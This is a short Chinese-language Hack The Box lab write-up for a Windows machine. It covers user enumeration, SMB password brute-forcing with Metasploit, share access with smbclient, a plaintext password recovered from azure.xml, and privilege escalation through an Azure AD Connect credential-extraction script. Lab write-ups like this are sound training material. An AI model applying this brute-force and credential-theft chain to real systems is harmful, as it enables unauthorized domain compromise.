基本信息

lab地址:https://www.hackthebox.eu/home/machines/profile/223

  • 10.10.10.172

端口扫描

windows服务器,没有web:

enum4linux

根据结果生成用户名字典:

1
2
3
4
5
6
7
8
9
10
Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan

smb login

使用这个字典爆破smb:

1
msf auxiliary/scanner/smb/smb_login

得到一组账号密码:

1
SABatchJobs:SABatchJobs

但这个账号尝试使用evil-winrm登录失败:

smbclient

直接使用smbclient登录失败,可以访问共享目录:

1
2
smbclient -L 10.10.10.172 -U SABatchJobs
smbclient //10.10.10.172/users$ -U SABatchJobs

azure.xml

在这个目录发现一个azure.xml文件,里面有一个密码:

1
mhope : 4n0therD4y@n0th3r$

user flag

使用这个账号密码登录,在桌面得到user.txt:

提权信息

1
whoami /all

可以看到mhope是azure admin:

搜索相关信息,用到的资料和脚本:

Azure-ADConnect

执行得到Administrator密码:

root flag

登录后在桌面得到root.txt:

参考资料